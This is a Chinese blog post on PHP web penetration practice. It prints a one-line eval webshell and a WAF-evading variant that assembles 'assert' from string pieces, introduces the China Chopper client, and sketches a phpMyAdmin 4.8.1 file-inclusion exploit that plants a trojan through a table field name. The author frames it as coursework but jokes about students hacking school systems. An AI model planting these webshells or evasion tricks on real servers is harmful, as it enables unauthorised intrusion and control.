web渗透-php文件上传/包含漏洞测试记录

几个月之前就开始写了,这个时间才发出来,主要原因是博客最后部分的实战是想覆盘一遍,把过程记录进去,但是又懒得覆盘,所以一直放着就忘记了。最后的结果就是不做覆盘了,网上的资料很多。

前言

不知不觉中这一学期已然结束,也有一段时间没有写博客了,主要是临近期末,准备各门课的课设和考试,没有什么时间来写博客。这篇博客便对期末时自己的一些不务正业做个记录。
所谓不务正业,就是在准备php课设时对web渗透产生了一些兴趣,并且做了一些尝试。在这篇博客中做一个总结分享记录。

WebShell

首先解释一下什么是WebShell,WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门。黑客通过各种手段将木马脚本文件保存在靶机服务器目录下,与正常文件混淆在一起,通过Get/Post方式提交代码至木马文件,木马文件脚本就会运行你的代码,从而达到各种目的。

一句话木马

举一个最简单的木马例子,php的一句话木马脚本:

<?php @eval($_POST["pass"]);?>

eval即是将参数字符串内容当作代码来执行,"pass"即是post方式提交的参数的key值。
但是这种一句话木马极大可能会被WAF防火墙给干掉,需要变一变,也就是做免杀处理:

<?php
	$str = "abcdefs";
	$s = substr($str,-1,1);
	$ev = 'a' . $s . 'sert';
	$ev($_POST['pass']);
?>

菜刀

有了一句话木马,并通过手段放入靶机服务器目录后,即可传入代码达到目的,如果通过手工方式书写各种功能脚本代码较为麻烦,这里就要介绍一个好用的工具了,那就是大菜刀了——中国菜刀,所谓武功再高也怕菜刀。去 过狗菜刀 官网卖菜刀的地,买一把耍一耍。
菜刀的主界面
在这里插入图片描述
在这里插入图片描述
以上就是菜刀的简单应用,只需要添加你的木马脚本地址即可,上图中ip地址为本人自己内网搭建的靶机环境。通过操作菜刀即可实现webshell的常见功能,当然也可以自写脚本,但是要做一些过WAF的处理,就像上面的免杀一句话木马一样。

文件上传/包含漏洞

文件包含或者文件上传漏洞原理都类似,只是实现的手段不同。其原理都是让靶机服务器执行你需要的的脚本文件,达到你需要的目的。
不知不觉中已经快大四了,以前也是经常听闻各种学长入侵学校图书馆管理系统或是教务系统修改个人成绩的浑事,有时也是一笑,不过好像作为计算机的学生在大学不做点这种浑事貌似都有点遗憾,毕竟学校还是比较包容的,进入社会再做这些浑事就不能善了了。这学期的php课程算是弥补了我的这个遗憾,不过也并不算是入侵,毕竟也算是作业的一部分。

文件上传利用

这个漏洞利用在我的个人实践中做的十分简单,
下面要介绍的是一个phpMyAdmin4.8.1的一个文件包含漏洞的利用过程。
具体就不多做覆盘了,原理就是利用phpMyAdmin4.8.1连接过滤规则的漏洞,注入目标文件的地址,做到包含恶意文件达到目的。恶意文件则是通过建表生成,将表字段名,写成一句话木马即可做到。由于目标主机使用wamp部署,所以目录结构非常明确。所以这个漏洞利用必须建立在有库密码的情况下。漏洞细节我贴个参考地址<<,懒得自己覆盘了。我就说一句,php课程报告服务器的phpMyAdmin的版本就是4.8.1。
.

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章